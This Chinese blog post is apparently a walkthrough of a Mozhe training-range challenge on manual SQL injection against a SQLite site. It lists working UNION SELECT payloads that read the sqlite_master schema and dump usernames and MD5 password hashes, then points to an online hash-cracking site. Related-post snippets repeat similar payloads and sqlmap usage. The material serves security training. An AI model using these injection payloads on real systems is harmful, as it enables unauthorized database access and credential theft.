墨者 - SQL手工注入漏洞测试(SQLite数据库)

最新推荐文章于 2025-06-06 15:54:31 发布
最新推荐文章于 2025-06-06 15:54:31 发布
阅读量1.4k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39936434/article/details/94722615
本文分享了一个SQL注入攻击的实际案例,详细介绍了如何通过测试注入点、爆表和爆库等手段,最终获取到了MD5加密的密码,并提供了在线解密工具的链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

/new_list.php?id=1 order by 2 测试注入点

有回显,并且测试有4个字段

盲猜表,admin,member,manage,都没有

 投机取巧的方法没有......老老实实去爆表吧

 测试回显位置, /new_list.php?id=1 union select 1,2,3,4

 爆库,用database()

 发现mysql的语法在这里不适合用,然后上网查找sqlLite的语法

参考如下链接:https://www.cnblogs.com/xiaozi/p/5760321.html

SQLite 存在一个表sqlite_master ,里面的字段:type/name/tbl_name/rootpage/sql记录着用户创建表的信息

抱着试一试的心态,查找这个sqlite_master 表是否存在

 真的存在!开始爆这个表的字段值

/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master

 

 出现了信息,用户创的表,字段。

直接查/new_list.php?id=1 union select 1,name,password,4 from WSTMart_reg

 查出来密码是MD5加密的,在线解密即可

 看评论说很多人解密不了,附上解密成功的工具链接:https://www.cmd5.com/

墨者学院 - SQL手工注入漏洞测试(SQLite数据库)
多崎巡礼的博客
08-20 1794
  网站公告存在注入点   ip/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master limit 0,1 ip/new_list.php?id=1 and 1=2 union select 1,name,password,4 from WSTMart_reg      ...
墨者靶场 初级: SQL手工注入漏洞测试(SQLite数据库)
qq_43233085的博客
01-13 642
@[toc](墨者靶场 初级: SQL手工注入漏洞测试(SQLite数据库)) 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+SQLite,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解SQLite的数据结构; 4.了解字符串的MD5加解密...
06#墨者靶场-SQL手工注入漏洞测试(SQLite数据库)
shy的博客
11-15 631
地址:https://www.mozhe.cn/bug/detail/UzRPT0FZSTZDeWVid2duMVcyV055dz09bW96aGUmozhe 1.打开靶场环境,发现熟悉的通告 2.输入单引号(异常)、and 1=1、and 1=2(异常)判断存在有SQL注入存在 http://219.153.49.228:45494/new_list.php?id=1%20and%20...
从一道sqlite注入靶场,分析sqlite注入方式
最新发布
Raners_的博客
06-06 216
ok,以上是对sqlite的特性简单介绍了一下。接下来,来看一下sqlite相关的注入手法。sqlite是一个更简单易用的数据库。这里简单和mysql对比一下。这一句表示创建了flag表,并且里面只有一个flag列。还有很多手法,可以看看这篇文章。
SQL手工注入漏洞测试(Sql Server数据库)
weixin_33853827的博客
01-21 142
还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL注入。 一、盲注 盲猜爆出表名 通过SQL语句中的a...
0x2E.SQL手工注入漏洞测试(SQLite数据库)
qq_31679787的博客
11-14 352
通过加单引号及使用and进行判断存在sql注入; 使用order by测试存在4列; 通过联合查询得到显示位; 通过sqlite_master隐藏表爆表名及建表语句; 建表语句中可以得到表名及列名,可以爆出数据; Md5解密后得到密码; 登录得到key; SQLite存在sqlite_maste...
SQL注入(不同数据库之间)
qi_SJQ_的博客
11-08 1421
简要学习各种数据库注入特点: 数据库:Access, mysql ,mssql(sql server) mongoDB, postgresql, sqlite,oracle, sybase等。 工具:Sqlmap, NoSQLAttack, Pangolin等。 其他数据库大体结构都相同,但access的数据库存在于asp网站内的一个文件夹下,不同网站对应不同数据库。 因此注入方式有所不同,不用注库名,而且没有access数据库没有文件读写功能等等特点。 故有以下结构: ...
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 803
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
B站小迪安全笔记第十五天-SQL注入之Oracle,mongoDB等注入
m0_61530426的博客
07-29 735
B站小迪安全笔记
SQL手工注入漏洞测试(SQLite数据库)
weixin_47493074的博客
10-06 890
SQL手工注入漏洞测试(SQLite数据库)
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记
Routine_limon的博客
07-14 364
靶环境:IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。 解题目标: 手工进行SQL注入测试,获取管理密码登录。 使用sqlmap获取数据库中的表名和字段名;如图: 通过:sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --dbs 获取数据库中的表名 sqlmap.py -u http://2...
0x08.SQL手工注入漏洞测试(Sql Server数据库)
qq_31679787的博客
09-19 198
点击通知栏,出现注入页面; 爆数据库; 爆表名; 爆列名; 爆数据,但是发现得到的账号密码不正常; 将注入方式设置为布尔注入,得到账号密码; md5解密得到密码,登录得到key; ...
腾讯安全团队披露SQLite数据库漏洞,数千款日常必备软件或受影响
mozhe_的博客
12-18 517
据报道,由腾讯刀锋安全团队发现的一个新的SQLite数据库漏洞可能会影响到数千款常用的桌面和移动应用程序,包括谷歌Chromium浏览器。具体而言,该漏洞允许攻击者在受害者的计算机上运行恶意代码,并可能会导致内存泄露或应用程序崩溃。 SQLite是一种轻量级数据库,支持Windows、Linux和Unix等主流操作系统,且能够与多种编程语言(如 Tcl、C#、PHP和Java等)结合使用。相比主...
墨者学院 - SQL手工注入漏洞测试(PostgreSQL数据库)
多崎巡礼的博客
08-20 3491
postgreSQL注入和mysql注入语法是类似的,有一点小的差异: postgreSQL查询当前数据库使用:current_database()函数; 在pg_stat_user_tables库查询表名,使用relname关键字; 和MySQL的limit使用有差异,语法为limit 1 offset 0。     手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,...
WEB渗透Web突破篇-SQL注入SQLite
qq_59468567的博客
07-31 576
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'
php sqlite 注入,SQLite手工注入方法小结
weixin_36135382的博客
03-10 148
SQLite 官网下载:www.sqlite.org/download.htmlsqlite管理工具:http://www.yunqa.de/delphi/products/sqlitespy/indexsqlite_master隐藏表,具体内容如下:字段:type/name/tbl_name/rootpage/sqlsqlite注入测试:1、Union select 查询select * fro...
一天学完SQLite数据库与其注入方式
qq_52643498的博客
05-11 1682
一天学完sqlite并掌握其注入方式的学习笔记 适合掌握mysql基础的读者看着玩玩
SQLite 注入
冷月醉雪的博客
02-08 766
    注入通常在请求用户输入时发生,比如需要用户输入姓名,但用户却输入了一个SQLite语句,而这语句就会在不知不觉中在数据库上运行。    永远不要相信用户提供的数据,所以只处理通过验证的数据,这项规则是通过模式匹配来完成的。下面的实例中,用户名username被限制为字母数字字符或者下划线,长度必须在8到20个字符之间-请根据需要修改这些规则。   if (preg_match("/...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值